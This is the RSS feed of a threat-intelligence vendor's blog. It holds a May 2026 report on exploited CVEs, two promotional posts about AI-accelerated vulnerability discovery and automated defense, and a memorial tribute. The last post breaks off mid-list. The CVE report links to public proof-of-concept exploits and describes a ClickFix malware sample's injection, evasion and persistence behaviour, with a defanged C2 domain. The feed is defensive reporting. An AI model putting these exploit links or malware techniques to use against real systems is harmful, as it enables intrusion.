<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>Recorded Future</title>
        <link>https://www.recordedfuture.com</link>
        <description>Strengthen Your Defenses with Threat Intelligence</description>
        <lastBuildDate>Mon, 08 Jun 2026 15:06:33 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>Recorded Future, Inc.</generator>
        <language>en</language>
        <copyright>Copyright © 2026 Recorded Future, Inc.</copyright>
        <atom:link href="https://www.recordedfuture.com/feed/blog" rel="self" type="application/rss+xml"/>
        <item>
            <title><![CDATA[May 2026 CVE Landscape]]></title>
            <link>https://www.recordedfuture.com/blog/may-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/may-2026-cve-landscape</guid>
            <pubDate>Mon, 08 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[In May 2026, Insikt Group® identified 41 high-impact vulnerabilities that should be prioritized for remediation, all of which had a Very Critical Recorded Future Risk Score. This represents an 11% increase from last month.]]></description>
            <content:encoded><![CDATA[
        <p>In May 2026, <a href="https://www.recordedfuture.com/research/insikt-group">Insikt Group®</a> identified <strong>41 high-impact vulnerabilities that should be prioritized for remediation</strong>, all of which had a Very Critical Recorded Future Risk Score. This represents an 11% increase from last month.</p>
        <p>These vulnerabilities affected products from 20 vendors. 21 of the 41 vulnerabilities were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, 19 were surfaced through honeypot data, and one was reported by a cybersecurity vendor.</p>
        <p>Of those 20 vendors, Vercel accounted for approximately 27% of the vulnerabilities, driven by honeypot-sourced Next.js activity. The remaining exposure was concentrated across a range of enterprise software, security, networking, developer tooling, and cloud-related products.</p>
        <h2>Quick Reference: May 2026 Vulnerability Table</h2>
        <p><em>All 22 vulnerabilities below were actively exploited in May 2026. This table does not include the 19 CVEs associated with honeypot activity, which are available to Recorded Future customers via the CVE Monthly Report. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.</em></p>
        <table>
          <thead>
            <tr>
              <th>#</th>
              <th>Vulnerability</th>
              <th>Risk Score</th>
              <th>Vendor/Product</th>
              <th>KEV</th>
              <th>Malware Analysis</th>
              <th>RCE</th>
              <th>PoC</th>
            </tr>
          </thead>
          <tbody>
            <tr><td>1</td><td>CVE-2008-4250</td><td>99</td><td>Microsoft Windows</td><td>✓</td><td></td><td>✓</td><td><a href="https://www.exploit-db.com/exploits/7132">✓ Link</a></td></tr>
            <tr><td>2</td><td>CVE-2009-1537</td><td>99</td><td>Microsoft DirectX</td><td>✓</td><td></td><td></td><td></td></tr>
            <tr><td>3</td><td>CVE-2009-3459</td><td>99</td><td>Adobe Acrobat and Reader</td><td>✓</td><td></td><td></td><td></td></tr>
            <tr><td>4</td><td>CVE-2010-0249</td><td>99</td><td>Microsoft Internet Explorer</td><td>✓</td><td></td><td></td><td><a href="http://www.exploit-db.com/exploits/11167">✓ Link</a></td></tr>
            <tr><td>5</td><td>CVE-2010-0806</td><td>99</td><td>Microsoft Internet Explorer</td><td>✓</td><td>✓<br />(available to Recorded Future Customers)</td><td></td><td></td></tr>
            <tr><td>6</td><td>CVE-2025-34291</td><td>99</td><td>Langflow</td><td>✓</td><td></td><td></td><td><a href="https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform">✓ Link</a></td></tr>
            <tr><td>7</td><td>CVE-2026-0257</td><td>99</td><td>Palo Alto Networks PAN-OS, Cloud NGFW, and Prisma Access</td><td>✓</td><td></td><td></td><td><a href="https://github.com/search?q=CVE-2026-0257&amp;type=repositories">✓ Link</a></td></tr>
            <tr><td>8</td><td>CVE-2026-0300</td><td>99</td><td>Palo Alto Networks PAN-OS, Cloud NGFW, Prisma Access</td><td>✓</td><td></td><td></td><td><a href="https://github.com/search?q=CVE-2026-0300&amp;type=repositories">✓ Link</a></td></tr>
            <tr><td>9</td><td>CVE-2026-20182</td><td>99</td><td>Cisco Catalyst SD-WAN and SD-WAN Manager</td><td>✓</td><td></td><td></td><td><a href="https://github.com/search?q=CVE-2026-20182&amp;type=repositories">✓ Link</a></td></tr>
            <tr><td>10</td><td>CVE-2026-31431</td><td>99</td><td>Linux Kernel</td><td>✓</td><td>✓<br />(available to Recorded Future Customers)</td><td></td><td><a href="https://github.com/search?q=CVE-2026-31431&amp;type=repositories">✓ Link</a></td></tr>
            <tr><td>11</td><td>CVE-2026-34926</td><td>99</td><td>Trend Micro Apex One (On-Premise)</td><td>✓</td><td></td><td></td><td></td></tr>
            <tr><td>12</td><td>CVE-2026-41091</td><td>99</td><td>Microsoft Defender</td><td>✓</td><td></td><td></td><td><a href="https://github.com/0xBlackash/CVE-2026-41091">✓ Link</a></td></tr>
            <tr><td>13</td><td>CVE-2026-42208</td><td>99</td><td>BerriAI LiteLLM</td><td>✓</td><td></td><td></td><td><a href="https://github.com/search?q=CVE-2026-42208&amp;type=repositories">✓ Link</a></td></tr>
            <tr><td>14</td><td>CVE-2026-42897</td><td>99</td><td>Microsoft Exchange Server</td><td>✓</td><td></td><td></td><td><a href="https://github.com/atiilla/CVE-2026-42897">✓ Link</a></td></tr>
            <tr><td>15</td><td>CVE-2026-45321</td><td>99</td><td>TanStack (Multiple Packages)</td><td>✓</td><td></td><td></td><td><a href="https://github.com/search?q=CVE-2026-45321&amp;type=repositories">✓ Link</a></td></tr>
            <tr><td>16</td><td>CVE-2026-45498</td><td>99</td><td>Microsoft Defender</td><td>✓</td><td></td><td></td><td></td></tr>
            <tr><td>17</td><td>CVE-2026-48027</td><td>99</td><td>Nx Console</td><td>✓</td><td></td><td></td><td></td></tr>
            <tr><td>18</td><td>CVE-2026-48172</td><td>99</td><td>LiteSpeed cPanel Plugin</td><td>✓</td><td></td><td></td><td><a href="https://github.com/search?q=CVE-2026-48172&amp;type=repositories">✓ Link</a></td></tr>
            <tr><td>19</td><td>CVE-2026-6973</td><td>99</td><td>Ivanti Endpoint Manager Mobile (EPMM)</td><td>✓</td><td></td><td>✓</td><td></td></tr>
            <tr><td>20</td><td>CVE-2026-8398</td><td>99</td><td>Daemon Tools Lite</td><td>✓</td><td></td><td></td><td></td></tr>
            <tr><td>21</td><td>CVE-2026-9082</td><td>99</td><td>Drupal Core</td><td>✓</td><td></td><td></td><td><a href="https://github.com/search?q=CVE-2026-9082&amp;type=repositories">✓ Link</a></td></tr>
            <tr><td>22</td><td>CVE-2026-26980</td><td>99</td><td>Ghost CMS</td><td></td><td>✓<br />(available to Recorded Future Customers)</td><td></td><td><a href="https://github.com/dinosn/ghost-cve-2026-26980">✓ Link</a></td></tr>
          </tbody>
        </table>
        <p><em><strong>Table 1:</strong> List of vulnerabilities that were actively exploited in May 2026 based on Recorded Future data (excluding honeypot-sourced CVEs).</em></p>
        <h2>Key Trends: May 2026</h2>
        <ul>
          <li>In May 2026, threat actors exploited a Ghost CMS vulnerability in large-scale ClickFix and FakeCaptcha poisoning campaigns.
            <ul>
              <li>The campaigns used compromised Ghost CMS websites to inject malicious JavaScript, redirect victims through social engineering lures, and stage dropper and loader payloads from attacker-controlled infrastructure.</li>
            </ul>
          </li>
          <li>12 of the 41 vulnerabilities enabled remote code execution (RCE), affecting products from 8 vendors: Microsoft, Adobe, Langflow, Palo Alto Networks, Apache, openDCIM, Fortinet, and Ivanti.</li>
          <li>Insikt Group identified public proof-of-concept (PoC) exploits for 32 of the 41 vulnerabilities in this report.</li>
          <li>The most commonly observed flaws this month were CWE-79 (Cross-site Scripting), CWE-506 (Embedded Malicious Code), and CWE-89 (SQL Injection), with three CVEs each.</li>
          <li>5 of the 41 vulnerabilities in this month’s prominent vulnerabilities table were first disclosed between 2008 and 2010, making them at least 15 years old, with the oldest vulnerability being approximately 18 years old.
            <ul>
              <li>This reinforces our finding that attackers continue to exploit long-known weaknesses in environments where patching has lagged.</li>
              <li>Additionally, the fastest observed time from a vulnerability’s public disclosure to exploitation was less than one day.</li>
            </ul>
          </li>
        </ul>
        <h2>Exploitation Analysis</h2>
        <p>This section highlights some of the highest-impact, actively exploited vulnerabilities this month, specifically those linked to known threat actor campaigns or that have public PoC exploits available. Vulnerabilities with no meaningful public technical detail are summarized in the disclosures table only.</p>
        <h2>Threat Actors Exploit CVE-2026-26980 in Ghost CMS To Conduct Large-Scale ClickFix Poisoning Campaigns, Sample Available From Recorded Future Malware Intelligence</h2>
        <p>On May 21, 2026, cybersecurity firm XLab published a <a href="https://blog.xlab.qianxin.com/ghost-cms-mass-compromised-via-cve-2026-26980-now-fueling-clickfix-attacks/">technical analysis</a> detailing large-scale ClickFix poisoning campaigns targeting vulnerable Ghost Content Management System (CMS) instances by exploiting CVE-2026-26980. Ghost CMS allows users to create, manage, and publish content for blogs, media sites, newsletters, and subscription-based websites through a Node.js-based publishing platform.</p>
        <p>CVE-2026-26980 is a critical SQL injection vulnerability in Ghost CMS that allows unauthenticated threat actors to extract Ghost Admin API Keys and modify website content through the Ghost Admin API.</p>
        <p>As <a href="https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos">previously reported</a> by Insikt Group®, at least two threat groups exploited CVE-2026-26980 to inject malicious JavaScript into more than 700 compromised Ghost CMS websites across industries, including blockchain, artificial intelligence (AI), and financial technology (fintech). According to XLab, the threat actors used the compromised websites to deliver ClickFix and FakeCaptcha social engineering attacks that tricked victims into executing malicious commands and malware payloads on their systems.</p>
        <p>Insikt Group® obtained one of the malicious samples, <code>UtilifySetup.exe</code>, from Recorded Future <a href="https://www.recordedfuture.com/products/threat-intelligence/malware-intelligence">Malware Intelligence</a>. The sample matched the sandbox YARA rule for detecting Inno Setup packaging. Based on sandbox and static code analysis, the sample performs the following actions on a victim’s machine:</p>
        <ul>
          <li>Conducts DLL injection</li>
          <li>Retrieves the system language and geolocation using the Windows registry</li>
          <li>Drops files named <code>UtilifySetup.tmp</code> (SHA256: 7790fd1035266000ed6d6cc35822f7683f5271663af8a5b5effadff85316df6d) and <code>Grape.exe</code></li>
          <li>Enumerates files and directories</li>
          <li>Retrieves system information</li>
          <li>Delays execution using the Sleep API function for evasion</li>
          <li>Detects debuggers by comparing timings obtained from the <code>GetTickCount</code> API function and by calling the <code>IsDebuggerPresent</code> API function</li>
          <li>Creates a file inside the <code>C:\Users\user\AppData\Local\SuperMaxionQuickMaxlite</code> directory, corroborating XLab’s analysis</li>
          <li>Terminates running processes</li>
        </ul>
        <p>Sandbox analysis categorized <code>UtilifySetup.tmp</code> as malicious due to the sample exhibiting discovery capabilities. Based on sandbox and static code analysis, the sample performs the following actions on a victim’s machine:</p>
        <ul>
          <li>Conducts DLL injection</li>
          <li>Retrieves the system language and geolocation using the Windows registry</li>
          <li>Executes the <code>UtilifySetup.exe</code> installer from the <code>%Temp%</code> directory using internal Inno Setup /SL5 launch parameters</li>
          <li>Executes a file named <code>Grape.exe</code> inside the <code>C:\Users\user\AppData\Local\SuperMaxionQuickMaxlite</code> directory</li>
        </ul>
        <p>Once executed, <code>Grape.exe</code> performs the following actions on a victim’s machine:</p>
        <ul>
          <li>Adds a Windows registry Run key entry named <code>electron.app.Grape</code> set to execute itself when the victim logs in</li>
          <li>Enumerates running processes</li>
          <li>Sends a DNS request to <code>web-telegram[.]ug</code></li>
        </ul>
        <p>Further technical details associated with this activity, including sample analysis, MITRE ATT&amp;CK techniques, and IoCs, are available to Recorded Future customers via Insikt Group® reporting.</p>
        <p>Recorded Future customers can also access <a href="https://www.recordedfuture.com/products/threat-intelligence/malware-intelligence">Malware Intelligence</a> queries that surface samples communicating with campaign-associated URLs, domains, and IP addresses.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1720aa516c85e3e0338c7cc0d81f4ae569e0dce5f.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="1095" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong> Risk Rules History from <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> Card® for CVE-2026-26980 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1239191713c0e7359a6e3e0dd047fe76e065dcc92.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Why Holistic Sourcing Wins: The Numbers Behind the Recorded Future Advantage]]></title>
            <link>https://www.recordedfuture.com/blog/recorded-future-holistic-sourcing-wins</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/recorded-future-holistic-sourcing-wins</guid>
            <pubDate>Fri, 05 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future’s Intelligence Graph® uses holistic sourcing across 1M+ sources for complete threat intelligence and proactive defense.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>Threats don't operate in silos, and neither should your intelligence. This post, the first in a three-part series, breaks down why comprehensive sourcing is the foundation of effective threat intelligence, and how Recorded Future's Intelligence Graph® monitors over one million sources across technical, criminal, collective, and open-source domains to surface what narrow or siloed solutions miss. From nation-state TTPs to criminal infrastructure to credential leaks, complete coverage is what separates awareness from action.</div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1c33725653d37008dda6f111b94b468e5a9197eb5.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Remembering Sir Alex Younger]]></title>
            <link>https://www.recordedfuture.com/blog/remembering-sir-alex-younger</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/remembering-sir-alex-younger</guid>
            <pubDate>Thu, 04 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A personal tribute to Sir Alex Younger, former head of MI6, on the friendship, lessons, and clarity he brought to Recorded Future and to those who knew him.]]></description>
            <content:encoded><![CDATA[
        <p>There are moments when you meet a person who you immediately know will have a formative influence on you — a person you will learn from, who you will respect, who you will follow anywhere, who you will listen to, who will be your friend. Sir Alex was just that.</p>
        <p>I was lucky to meet Sir Alex just as he was leaving MI6 in 2020. I traveled to London, having to navigate a few Covid restrictions. I asked him if this would cause problems. He smiled: “It is always better to ask for forgiveness than seek permission,” he said. Immediately I knew that this was someone I would get along with very well.</p>
        <p>The objective was straightforward: I was hoping to recruit him to the Recorded Future board of directors, which we eventually accomplished after significant complications got in the way, once again solved by the previous method.</p>
        <p>Sir Alex joined a Recorded Future board meeting in New York. As I welcomed him, Alex — smiling characteristically — introduced himself as having run the world’s best intelligence agency, a pointed reminder that superb people, tradecraft, and pedigree can rival any scale. And we wanted to learn from the best.</p>
        <p>My assumption, as much as one should not make them, was that Alex could teach us everything in intelligence, except for perhaps around the technical SIGINT-like apparatus that is at the core of Recorded Future. Yet, in our first discussion, talking about “connecting dots,” Alex said, “it is not about connecting dots, it is about connecting entire collections,” which became the very underpinning of how we build our Intelligence Graph®. I was humbled, having underestimated him, and it taught me a valuable lesson.</p>
        <p>Yet, the confidence of having run the world’s best intelligence agency did not at all hold back Alex from asking even the most basic questions. Coming from public service, driving revenue was not a familiar concept. As opposed to most senior characters who would do anything to not seem to have all the answers, Alex, early in the first meeting, when hearing the terms ARR and revenue, raised his hand and said, “please explain annualized revenue.” That is the sign of somebody who always wanted to learn and would not let pride get in the way of gaining insights.</p>
        <p>Sir Alex brought great moral clarity, yet not the kind that is based on anger, “you’re either with us or against us,” rather, the kind that leads to an alliance of peers sharing in values that can defeat any autocratic counterpart. Teamwork, he would say, is the unique strength of the West, as we can build on trust, whereas our adversaries fundamentally cannot.</p>
        <p>Speaking at the Recorded Future 2023 Predict conference, our audience spellbound, Sir Alex paraphrased Milton Friedman: “No individual can make a pencil alone.” He was cheered by everyone, and we know that this was the answer to beat our adversaries.</p>
        <p>Over the last few months, I asked Alex for some favors, and I now find myself wondering whether I asked too much of him. He gave a briefing to thousands of Recorded Future clients on Iran with an energy and intellect that would put anyone to shame. And more recently, I asked him for help with a personal endeavour, which in hindsight was too much to ask at the time, yet he did something amazing.</p>
        <p>I can only hope that I can be such a friend to my friends as Alex was to me.</p>
        <p>Six months ago, when Alex was in the midst of treatment, I asked him if I could take him for a special dinner. We enjoyed amazing food and, truth be told, even more amazing wine. I came early to the restaurant and suggested to them, “he may eat and drink a little, please do not make a fuss about that.” Yet, Alex went at the food and wine with a vengeance, claiming that his treatment left him very hungry. If there ever was a fighting spirit, it was his.</p>
        <p>
          <img loading="lazy" alt="Sir Alex and Christopher sitting at a restaurant and a picture of the course menu on the left." src="https://www.recordedfuture.com/media_1a6cd8aa62d35e646745b37cdc6abdbf342d79aa8.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="946" />
        </p>
        <p>Please join my Recorded Future colleagues in our cheers for Sir Alex Younger and thoughts for Sarah and their family.</p>
        <p>I’m certain that he would want us to take the fight to the bad guys and build even greater alliances with our friends.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_11fb4d20a4aa7d0507492273773ba1976b49b62d3.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Vulnerability Flood Is Now a Board Conversation. Here's How to Lead It.]]></title>
            <link>https://www.recordedfuture.com/blog/vulnerability-board-conversation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/vulnerability-board-conversation</guid>
            <pubDate>Thu, 21 May 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Boards are asking about AI-driven vulnerability discovery. The leaders who answer that question well will come out with more credibility and more resources. Here's how to be one of them.]]></description>
            <content:encoded><![CDATA[
        <p>I've had some version of the same conversation dozens of times since Mythos and Daybreak emerged. CISOs want to know how worried they should be. My honest answer: less than the headlines suggest, and more than most programs are currently prepared for.</p>
        <p>Last year, roughly 50,000 software vulnerabilities were disclosed. Recorded Future tracked 446 that were actually <a href="https://www.recordedfuture.com/blog/ai-hype-vs-reality">weaponized by threat actors</a>. That's less than 1%. The problem was never finding vulnerabilities. It was always knowing which ones adversaries will actually use.</p>
        <p>AI makes that distinction harder. Discovery accelerates for everyone, the noise grows faster than any team can manually triage, and the window between a disclosed vulnerability and a working exploit keeps shrinking. Security leaders who've built intelligence-led programs are ready for what's coming. For them, Mythos isn't a crisis. It's the moment their program finally gets the attention it deserves, including in the boardroom.</p>
        <h2>The threat got faster. The fundamentals didn't.</h2>
        <p>The instinct to treat AI-assisted vulnerability discovery as a wholesale transformation of the threat landscape isn't quite right, and that imprecision will hurt you in a board conversation.</p>
        <p>What's changed is speed. AI has compressed the time between a disclosed vulnerability and a working exploit from days to minutes. Your team has to match that tempo.</p>
        <p>What hasn't changed is the fundamental prioritization problem. Disclosed vulnerabilities have more than doubled over the last five years, from roughly 21,000 in 2021 to approximately 50,000 in 2025. That growth happened before AI-assisted discovery became widely accessible. AI makes that challenge faster and more consequential. It doesn't make it new.</p>
        <p>That distinction matters because it changes the conversation from "we need to completely rebuild our security program" to "we need to make sure our intelligence capability is operating at the speed the threat environment now demands." The first conversation is expensive and destabilizing. The second is actionable.</p>
        <h2>Most programs have a triage problem, not a discovery problem</h2>
        <p>When an AI model returns hundreds of new vulnerability findings, the bottleneck shifts immediately to prioritization. In most organizations, that process is still largely manual. Analysts research each finding, assess severity, cross-reference existing guidance, and attempt to sequence a response. At the volume and velocity these models produce, that workflow can’t keep pace.</p>
        <p>The result is a backlog where genuinely critical exposures sit alongside noise, and triage decisions get made without the context needed to get them right. That's not a tooling problem. It's an intelligence problem.</p>
        <p>The organizations handling this well have built a layer between discovery and action that automatically correlates every finding against real-world adversary activity, flags vulnerabilities tied to active campaigns, and tells the analyst what it means and what to do about it, not just what was found. Raw discovery tells you that you have a problem. Intelligence-led response tells you which one to solve first, then hunts it down autonomously at machine speed.</p>
        <p>There's a second exposure worth naming, and it can produce an uncomfortable board conversation. Most enterprise security investment is concentrated on what enters the environment and what executes at the endpoint. AI-assisted discovery surfaces a different category of risk: exposures that already exist inside the environment, in software running on your infrastructure today, in third-party components that weren't fully inventoried, in vendor systems connected to yours in ways that aren't fully mapped.</p>
        <p>Organizations that have concentrated their posture at the edge may find that some of their most consequential vulnerabilities sit somewhere else. That's a hard answer to give a board that just read about Mythos. It's better to surface it yourself than to have someone else surface it for you.</p>
        <h2>The programs that didn't panic had something in common</h2>
        <p>The CISOs I talk to who've been building intelligence-led programs for years have handled Mythos differently than organizations that haven't. They didn't need to rebuild anything from the ground up. They used the moment to sharpen programs they'd already been investing in.</p>
        <p>But not every organization was already there when Mythos was announced, and that's the more important story for most security leaders reading this. The announcement was a forcing function. The organizations that treated it as one are already in a different position than the ones that didn't.</p>
        <p>A financial services customer who came to us shortly after the Mythos announcement is a good example of what moving quickly actually produces. They rebuilt their vulnerability workflow around our automation capability and within two weeks their team had recovered over 20 hours a week that had previously gone to manual triage and research. Those aren't hours saved on busywork. They're hours now going toward work that actually reduces exposure. And when the next wave hits, they won't be caught flat-footed.</p>
        <p>What made that possible wasn't just better tooling. It was an intelligence layer that automatically matches vulnerabilities to known threat actors, ties findings to active campaigns where relevant, and scores on real-world exploitation evidence rather than theoretical severity. Every finding arrives with the context an analyst needs to act, without hours of manual research standing between the signal and a response.</p>
        <p>The practical outcome is coverage at scale without proportionally growing the team. That's what operating at machine speed means in practice, and it can hold up in a board conversation for a simple reason: it's not just a security answer, it's a business one.</p>
        <h2>What wins the board conversation</h2>
        <p>Boards are asking about AI-driven vulnerability discovery because it's broken into mainstream coverage in a way most threat developments haven't. That attention isn't going away. Security leaders who can walk into that conversation with a clear, specific answer about how they're managing the risk will come out with more credibility and more resource authority.</p>
        <p>Mythos and Daybreak are the start of a longer trend. The right response isn't to treat each new model as a fresh crisis. It's to build the intelligence foundation that makes your program resilient regardless of what comes next. When you've done that, AI-assisted discovery stops being a source of anxiety and becomes what it should be: a faster path to finding and fixing what actually matters.</p>
        <p><em>Ready to go deeper on the operational response? Recorded Future Chief Product Officer Jamie Zajac lays out the full playbook</em> <em><a href="https://www.recordedfuture.com/blog/ai-vulnerability-playbook">here</a>.</em></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_17d0cb439a585bf962b1a79093d5c706376b68404.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[At Mythos Speed: A Defender's Playbook for the AI Vulnerability Surge in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/ai-vulnerability-playbook</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/ai-vulnerability-playbook</guid>
            <pubDate>Tue, 19 May 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Frontier AI models like Mythos are making vulnerability discovery fast and cheap. Here's how defenders use threat intelligence and agentic processing to prioritize and act at the same speed.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Discovery has been commoditized.</strong> Frontier AI models like Mythos and GPT 5.5 are making vulnerability discovery cheap, fast, and broadly accessible.</li>
          <li><strong>The defender's job is to match the speed.</strong> Manual triage has lost the throughput race.</li>
          <li><strong>Threat intelligence is the prioritization layer at machine speed.</strong> Recorded Future Intelligence observed only 446 actively exploited CVEs in 2025 against approximately 50,000 disclosed — less than 1%.</li>
          <li><strong>Recorded Future's agentic processing plus Autonomous Threat Operations can be the answer.</strong> It offers detection signatures in just 31 minutes and automated action across more than 100 integrations, with third-party reach coming soon. Attackers are operating at this speed. Your defenses have to match them.</li>
        </ul>
        <p>It’s now a question I get daily: “What is Recorded Future doing about Mythos?”</p>
        <p>It's a fair question. Anthropic's Project Glasswing announcement, paired with the vulnerability research benchmarks coming out of OpenAI's GPT 5.5, has made AI-driven vulnerability discovery a board-level topic in a matter of weeks.</p>
        <p>To answer that question, first we need to discuss the operational problem defenders actually face and why <a href="https://www.recordedfuture.com/threat-intelligence">threat intelligence</a> can be the best way to counter it at machine speed. Then we'll get into what Recorded Future is already deploying to solve it: our agentic processing.</p>
        <h2>The problem: drowning in signal, starving for context</h2>
        <p>Even before AI and the news of Mythos’ capabilities and speed, defenders were struggling. Signal volume was outpacing analyst capacity. Coverage gaps widened daily as long-tail vendors and niche platforms went unmonitored. Raw findings arrived without root cause, threat-actor relevance, or vetted remediation paths. Producing one analyst-grade enrichment took hours of senior researcher time. The math didn't work at enterprise scale.</p>
        <h2>The reality check: 50,000 disclosed, 446 actually exploited</h2>
        <p>The data point that should anchor any conversation about the AI vulnerability surge: the NVD disclosed approximately 50,000 CVEs in 2025. Recorded Future Intelligence observed only 446 actively exploited in the wild — <a href="https://www.recordedfuture.com/blog/ai-hype-vs-reality">less than 1%</a>.</p>
        <p>Finding vulnerabilities is one thing, but knowing which ones matter, to which environments, against which adversaries, and with which compensating controls already in place is a whole different matter. <a href="https://www.forrester.com/blogs/project-glasswing-shows-that-ai-will-break-the-vulnerability-management-playbook/">Forrester put it directly</a>: “<em>The limiting factor in security is no longer the ability and knowledge to find problems — it's the ability to absorb, prioritize, and act on them before adversaries do.”</em> The bottleneck has always been on the absorb-prioritize-act side. The find side was never the problem.</p>
        <p>Frontier AI models accelerate the finding side. Threat intelligence is what helps close the prioritization gap on the fixing side.</p>
        <h2>The prioritization filter: what turns 50,000 into 446</h2>
        <p>Threat intelligence is operational, not philosophical. It comes down to four signals that distinguish the small fraction of CVEs adversaries actually weaponize from the overwhelming majority that they don't. These four signals are non-negotiable for prioritizing at speed and scale:</p>
        <ol>
          <li><strong>A live risk score.</strong> A composite index of exploitation likelihood and impact, recalculated continuously as evidence shifts. Not a static CVSS rating; a live measure of which vulnerabilities are weaponizable, exploitable in modern environments, and likely to be picked up by threat actors.</li>
          <li><strong>Active exploitation in the wild.</strong> Observed exploitation evidence — not theoretical PoC availability, but documented use against real systems by real actors. Sources include open and dark web telemetry, vendor disclosures, government advisories (CISA KEV catalog and equivalents), and primary research like what Insikt Group® produces.</li>
          <li><strong>Ransomware actor association.</strong> Mapping CVEs to specific ransomware operators and access broker activity. The same vulnerability used by a financially motivated ransomware affiliate against your sector is a different incident than the same CVE in a state-actor toolkit targeting a different region.</li>
          <li><strong>Sector and campaign targeting.</strong> Which threat actors are targeting your industry, which TTPs they're using, which exposures map to known tooling.</li>
        </ol>
        <p>Together, these four signals are how you prioritize what actually matters for any given defender.</p>
        <h2>Recorded Future's answer: agentic processing plus Autonomous Threat Operations</h2>
        <p>If attackers are moving at Mythos speed, your defenses need to keep up using agentic processing and Autonomous Threat Operations. This is my answer to the question we started with about what Recorded Future is doing about the new world we live in.</p>
        <p>Agentic processing is the production system that turns exposure signals into deployable intelligence. The pipeline reads descriptions, vendor advisories, and patch diffs the moment they appear. It produces production-ready detection signatures — documented detection logic, evidence specification, passive fingerprinting strategy. It writes analyst-grade enrichment for every finding — root cause, exploit mechanics, threat-actor associations, prioritized defensive controls with deploy-time and false-positive estimates, validated remediation tasks with acceptance criteria and rollback plans.</p>
        <p>Its end-to-end target is identification to deployment in customer environments in only 31 minutes. Internal averages run lower. No security team operating manual triage workflows is matching that throughput.</p>
        <p>That content can reach every relevant control point in your environment through <a href="https://www.recordedfuture.com/products/autonomous-threat-operations">Autonomous Threat Operations (ATO)</a>.</p>
        <p>ATO turns agentic-processing outputs and correlated intelligence into operational action across over 100 integrations spanning SIEM, SOAR, EDR/XDR, NGFW, vulnerability management, threat intelligence platforms, identity and access management, email and cloud security, GRC, and threat-informed defense. It continuously deploys priority intelligence, runs autonomous threat hunts, pushes detection rules, and takes preventive action without analyst hours spent on manual correlation. The 8-to-12 hours of weekly correlation work most analyst teams perform manually is almost entirely eliminated. The hunting cadence becomes 24/7.</p>
        <p>Soon, ATO will do this across your attack surface and third parties, as vendor exposure has been the most common path to breach for the past three years.</p>
        <p>The five-stage pipeline that produces all of this — threat signals, intelligent enrichment, validation and verification, structured output, and customer workflow — runs continuously. Production-ready content is in customer environments within minutes of the originating disclosure across every category of threat the platform detects.</p>
        <h2>Why agentic processing is different, and why your organization needs it</h2>
        <p>Four things distinguish agentic processing from anything a security team can build manually:</p>
        <ol>
          <li><strong>Hours → minutes.</strong> A complete enriched finding can be produced in minutes, not the hours of manual research the same output used to require.</li>
          <li><strong>Order-of-magnitude efficiency.</strong> Based on Recorded Future R&amp;D findings, per-vulnerability triage runs at 40x the efficiency of manual research effort, enabling coverage at scale your team cannot achieve by hand.</li>
          <li><strong>Long-tail coverage.</strong> Localized vendors, niche platforms, and legacy systems become economically viable to cover at breadth.</li>
          <li><strong>Always current.</strong> Continuous refresh cycles keep intelligence accurate as threats evolve.</li>
        </ol>
        <p>These benefits represent the difference between preventing threats pre-attack and absorbing the damage after.</p>
        <p>Let’s look at an example of what agentic processing does at machine speed.</p>
        <h2>React2Shell with agentic processing</h2>
        <p>Take <a href="https://www.recordedfuture.com/blog/december-2025-cve-landscape">CVE-2025-55182</a> — React2Shell, a pre-authentication remote code execution vulnerability in React Server Components. Within minutes of disclosure, agentic processing produced:</p>
        <ol>
          <li>An Attack Surface Intelligence (ASI) detection signature with documented detection logic, evidence specification, and passive fingerprinting strategy</li>
          <li>Root cause and exploit mechanics down to the specific code path</li>
          <li>Active campaigns, threat-actor associations, observed exploitation evidence</li>
          <li>Confidence-graded indicators of compromise with detection commands</li>
          <li>Prioritized defensive controls with deploy-time and false-positive estimates</li>
